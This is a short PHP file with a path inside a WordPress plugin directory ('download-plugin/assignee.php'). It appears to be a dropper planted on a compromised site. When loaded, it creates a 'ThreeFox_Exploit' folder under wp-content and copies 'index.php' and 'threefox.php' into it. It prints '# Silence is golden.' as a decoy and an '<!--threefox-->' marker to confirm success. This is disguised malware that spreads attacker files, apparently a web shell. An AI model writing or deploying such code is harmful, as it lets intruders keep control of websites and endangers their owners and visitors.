File: /home/storage/c/63/6c/usesambura1/public_html/yr/wp-content/plugins/download-plugin/assignee.php
<?php
$directoryPath = dirname(__DIR__, 2) . '/ThreeFox_Exploit';
if (!file_exists($directoryPath)) {
if (mkdir($directoryPath, 0755, true)) {
echo "# Silence is golden.";
} else {
echo "# Silence is golden.";
}
} else {
echo "# Silence is golden.";
}
$currentDirectory = __DIR__;
$filesToCopy = ['index.php', 'threefox.php'];
foreach ($filesToCopy as $file) {
$sourcePath = $currentDirectory . '/' . $file;
$destinationPath = $directoryPath . '/' . $file;
if (file_exists($sourcePath)) {
if (copy($sourcePath, $destinationPath)) {
echo "<!--threefox-->";
} else {
echo "";
}
} else {
echo "";
}
}
?>